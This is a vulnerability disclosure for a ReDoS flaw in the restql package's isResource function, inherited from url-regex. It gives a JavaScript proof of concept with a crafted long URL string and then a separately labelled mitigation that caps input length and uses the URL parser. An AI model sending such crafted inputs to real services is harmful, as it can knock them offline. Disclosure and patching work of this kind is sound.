Regular Expression Denial of Service (ReDoS) #8

@Hbkhan

Description

Affected versions of this package are vulnerable to Regular Expression Denial of Service (ReDoS). An attacker providing a very long string to the isResource function in utils/isResource.js can cause a Denial of Service.

PoC

var restql = require("restql");

/**
 * @constant {string} resource The resource to fetch.
 */
const resource = 'https://pokeapi.co.asdasdasd.asdsadasdsadsad.asdasdsad.asdsadasdsa.sadasdsadas.dasdasasdasd.432asdas3423.3423423423.234234243.234234234.23423423.24234.'

/**
 * @constant {Object} resolver The resolver to apply.
 */
const resolver = {
  'abilities[]?.ability.url': {
    'generation.url': {
      'main_region.url': null,
    },
  },
  'stats[].stat.url?': {
    'affecting_natures.increase[].url': null,
    'affecting_natures.decrease[].url': null,
  },
  'moves[].move?.url': null,
}

/**
 * @constant {Object} options The options to bypass.
 */
const options = {
  // ...
};

(async () => {
  try {
    const data = await restql(resource, resolver, options)

    console.log(data)
  } catch (error) {
    console.error(error.message)
  }
})()

Technical Description

The vulnerability exists in #L16. The code depends on the url-regex package, which is itself vulnerable to this attack.
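For contrast with the regex-based check described above, here is an added example (not restql's code and not from the reporter) of a resource check that cannot be driven into catastrophic backtracking: it caps input length up front and hands parsing to the WHATWG URL parser instead of a backtracking regular expression. The helper name isResourceSafe and the 2048-character cap are assumptions.

```javascript
// Added example (not restql's own utils/isResource.js): a linear-time
// replacement for a regex-based "is this a fetchable URL" check.
// MAX_RESOURCE_LENGTH is an assumed cap, not a value from the project.
const MAX_RESOURCE_LENGTH = 2048;

function isResourceSafe(input, maxLength = MAX_RESOURCE_LENGTH) {
  if (typeof input !== 'string') return false;
  // Reject oversized input before any parsing so the cost stays bounded
  // regardless of how the string is shaped.
  if (input.length > maxLength) return false;
  let url;
  try {
    // Node's built-in WHATWG parser walks the string once; it has no
    // backtracking regex that an attacker-shaped host label could abuse.
    url = new URL(input);
  } catch (err) {
    return false;
  }
  // Only http(s) URLs with a non-empty host count as fetchable resources.
  if (url.protocol !== 'http:' && url.protocol !== 'https:') return false;
  return url.hostname.length > 0;
}

// Constructed sample inputs: a normal resource, an oversized host built
// from repeated labels (rejected by the length cap), and non-resources.
function checkSamples() {
  const oversized = 'https://' + 'a.'.repeat(5000) + 'example';
  return {
    normal: isResourceSafe('https://pokeapi.co/api/v2/pokemon/1'),
    oversized: isResourceSafe(oversized),
    plainText: isResourceSafe('not a url'),
    wrongScheme: isResourceSafe('ftp://example.org/file'),
    noHost: isResourceSafe('https://'),
    nonString: isResourceSafe(42),
  };
}

console.log(checkSamples());
```

Because the length check runs before any parsing, the time spent on a rejected input is independent of its contents, which is the property the regex-based check lacks.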
